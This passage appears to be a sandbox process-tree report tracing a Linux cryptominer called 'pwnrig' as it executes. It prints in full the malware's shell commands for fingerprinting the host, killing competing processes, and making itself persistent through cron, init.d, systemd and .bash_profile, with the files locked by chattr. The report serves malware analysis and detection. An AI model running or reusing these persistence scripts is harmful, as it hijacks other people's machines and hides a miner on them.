PID:2863

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:2864

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2865

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
PID:2866

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2867

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:2868

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:2869

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2870

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
PID:2871

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:2872

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2873

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:2874

/usr/bin/whoami
whoami
3⤵
PID:2885

/usr/bin/hostname
hostname
3⤵
PID:2886

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:2887

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:2903

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:2905

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
PID:2904

/usr/bin/id
id -u
3⤵
PID:2907

/usr/bin/grep
grep -v grep
3⤵
PID:2910

/usr/bin/grep
grep /etc/cron
3⤵
PID:2909

/usr/bin/ps
ps x
3⤵
- Reads CPU attributes
PID:2908

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
2⤵
- Writes file to tmp directory
PID:2912

/usr/bin/id
id -u
3⤵
PID:2913

/usr/bin/id
id -u
3⤵
PID:2914

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
3⤵
PID:2915

/usr/bin/rm
rm -rf /bin/bprofr
3⤵
PID:2916

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
3⤵
- Attempts to change immutable files
PID:2917

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/bprofr
3⤵
- Writes file to system bin folder
PID:2918

/usr/bin/id
id -u
3⤵
PID:2919

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
3⤵
PID:2920

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
3⤵
PID:2921

/usr/bin/chattr
chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:2922

/usr/bin/rm
rm -rf /bin/crondr
3⤵
PID:2923

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/crondr
3⤵
- Writes file to system bin folder
PID:2924

/usr/bin/tee
tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Creates/modifies Cron job
PID:2926

/usr/bin/sed
sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Creates/modifies Cron job
PID:2927

/usr/bin/chmod
chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:2928

/usr/bin/chattr
chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:2929

/usr/bin/which
which chkconfig
3⤵
PID:2930

/usr/bin/which
which update-rc.d
3⤵
PID:2931

/usr/bin/chattr
chattr -i -a /etc/init.d/pwnrig /bin/initdr
3⤵
PID:2932

/usr/sbin/update-rc.d
update-rc.d -f pwnrig disable
3⤵
- Flushes firewall rules
PID:2933

/usr/local/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:2934

/usr/local/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:2934

/usr/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:2934

/usr/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:2934

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2960

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:2960

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2960

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2960

/usr/sbin/update-rc.d
update-rc.d -f pwnrig remove
3⤵
PID:2986

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2987

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:2987

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2987

/usr/bin/systemctl
systemctl daemon-reload
4⤵
PID:2987

/usr/bin/rm
rm -rf /bin/initdr
3⤵
PID:3013

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/initdr
3⤵
- Writes file to system bin folder
PID:3014

/usr/bin/tee
tee /etc/init.d/pwnrig
3⤵
- Modifies init.d
PID:3016

/usr/bin/sed
sed -i "1 s/-e //" /etc/init.d/pwnrig
3⤵
PID:3017

/usr/bin/hostname
hostname -I
1⤵
PID:2877

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2879

/usr/bin/head
head -n 1
1⤵
PID:2883

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2884

/usr/bin/grep
grep "Port "
1⤵
PID:2882

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2881

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2893

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2892

/usr/bin/cut
cut -d: -f2
1⤵
PID:2891

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2890

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2896

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2899

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2902

/usr/bin/crontab
crontab -r
1⤵
PID:3308

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:3309

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
PID:3310

/usr/bin/bash
bash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:3311

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:3313

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:3314

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3315

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3316

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:3317

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:3318

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3319

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
PID:3320

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
PID:3321

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:3322

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3323

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3324

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:3325

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
- Attempts to change immutable files
PID:3326

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:3327

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3328

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3329

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:3330

/usr/bin/whoami
whoami
3⤵
PID:3341

/usr/bin/hostname
hostname
3⤵
PID:3342

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:3343

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:3359

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:3361

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3360

/usr/bin/id
id -u
3⤵
PID:3363

/usr/bin/grep
grep -v grep
3⤵
PID:3366

/usr/bin/grep
grep /etc/cron
3⤵
PID:3365

/usr/bin/ps
ps x
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:3364

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
2⤵
- Writes file to tmp directory
PID:3368

/usr/bin/id
id -u
3⤵
PID:3369

/usr/bin/id
id -u
3⤵
PID:3370

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
3⤵
- Attempts to change immutable files
PID:3371

/usr/bin/rm
rm -rf /bin/bprofr
3⤵
PID:3372

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
3⤵
PID:3373

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/bprofr
3⤵
- Writes file to system bin folder
PID:3374

/usr/bin/id
id -u
3⤵
PID:3375

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
3⤵
PID:3376

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
3⤵
PID:3377

/usr/bin/chattr
chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
- Attempts to change immutable files
PID:3378

/usr/bin/rm
rm -rf /bin/crondr
3⤵
PID:3379

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/crondr
3⤵
- Writes file to system bin folder
PID:3380

/usr/bin/tee
tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Creates/modifies Cron job
PID:3382

/usr/bin/sed
sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Attempts to change immutable files
- Creates/modifies Cron job
PID:3383

/usr/bin/chmod
chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:3384

/usr/bin/chattr
chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:3385

/usr/bin/which
which chkconfig
3⤵
PID:3386

/usr/bin/which
which update-rc.d
3⤵
PID:3387

/usr/bin/chattr
chattr -i -a /etc/init.d/pwnrig /bin/initdr
